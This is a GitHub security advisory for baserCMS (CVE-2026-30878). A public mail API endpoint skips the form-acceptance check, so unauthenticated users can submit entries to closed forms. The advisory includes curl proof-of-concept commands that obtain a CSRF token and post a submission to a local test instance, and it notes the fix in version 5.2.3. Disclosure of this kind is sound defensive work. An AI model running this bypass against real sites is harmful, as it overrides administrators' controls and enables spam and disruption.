GHSA-8CR7-R8QW-GP3C
Vulnerability from github – Published: 2026-03-31 22:36 – Updated: 2026-03-31 22:36Summary
A public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.
Details
In baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in MailFrontService::isAccepting(), which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).
These checks are enforced in the UI flow handled by MailController::index() and MailController::confirm()
(e.g. plugins/bc-mail/src/Controller/MailController.php).
However, the public API endpoint:
plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()
does not invoke MailFrontService::isAccepting() and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.
The endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.
PoC
- In the admin UI, configure a mail form so that it is not accepting submissions (e.g. outside its acceptance period or explicitly closed).
- Obtain a CSRF cookie by accessing the site root:
curl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'
- Extract the CSRF token from the
csrfTokencookie and submit a POST request to the public API endpoint:
curl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json'
-H 'Content-Type: application/x-www-form-urlencoded'
-H 'Referer: http://localhost/'
-H 'X-CSRF-Token: <csrf-token-from-cookie>'
-b /tmp/basercms_cookies.txt
--data-urlencode 'name_1=Test'
--data-urlencode 'name_2=User'
--data-urlencode 'email_1=test@example.com'
--data-urlencode 'email_2=test@example.com'
--data-urlencode 'category[]=資料請求'
--data-urlencode 'root=検索エンジン'
--data-urlencode 'message=API bypass test'
- The server responds with
200 OKand creates a mail message, even though the form is configured to reject submissions.
Impact
This is an access control / business logic bypass vulnerability.
Administrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.2.2"
},
"package": {
"ecosystem": "Packagist",
"name": "baserproject/basercms"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.2.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30878"
],
"database_specific": {
"cwe_ids": [
"CWE-285"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-31T22:36:18Z",
"nvd_published_at": "2026-03-31T01:16:35Z",
"severity": "MODERATE"
},
"details": "### Summary\nA public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.\n\n### Details\nIn baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).\n\nThese checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()` \n(e.g. `plugins/bc-mail/src/Controller/MailController.php`).\n\nHowever, the public API endpoint:\n\n`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`\n\ndoes not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form\u2019s acceptance state.\n\nThe endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.\n\n### PoC\n1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed).\n2. Obtain a CSRF cookie by accessing the site root:\n```\ncurl -sS -D - -o - -c /tmp/basercms_cookies.txt \u0027http://localhost/\u0027\n```\n3. Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:\n```\ncurl -sS -D - -o - -X POST \u0027http://localhost/baser/api/bc-mail/mail_messages/add/1.json\u0027 \n-H \u0027Content-Type: application/x-www-form-urlencoded\u0027 \n-H \u0027Referer: http://localhost/\u0027 \n-H \u0027X-CSRF-Token: \u003ccsrf-token-from-cookie\u003e\u0027 \n-b /tmp/basercms_cookies.txt \n--data-urlencode \u0027name_1=Test\u0027 \n--data-urlencode \u0027name_2=User\u0027 \n--data-urlencode \u0027email_1=test@example.com\u0027 \n--data-urlencode \u0027email_2=test@example.com\u0027 \n--data-urlencode \u0027category[]=\u8cc7\u6599\u8acb\u6c42\u0027 \n--data-urlencode \u0027root=\u691c\u7d22\u30a8\u30f3\u30b8\u30f3\u0027 \n--data-urlencode \u0027message=API bypass test\u0027\n```\n4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.\n\n### Impact\nThis is an access control / business logic bypass vulnerability.\n\nAdministrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.",
"id": "GHSA-8cr7-r8qw-gp3c",
"modified": "2026-03-31T22:36:18Z",
"published": "2026-03-31T22:36:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30878"
},
{
"type": "WEB",
"url": "https://basercms.net/security/JVN_20837860"
},
{
"type": "PACKAGE",
"url": "https://github.com/baserproject/basercms"
},
{
"type": "WEB",
"url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "baserCMS has Mail Form Acceptance Bypass via Public API"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.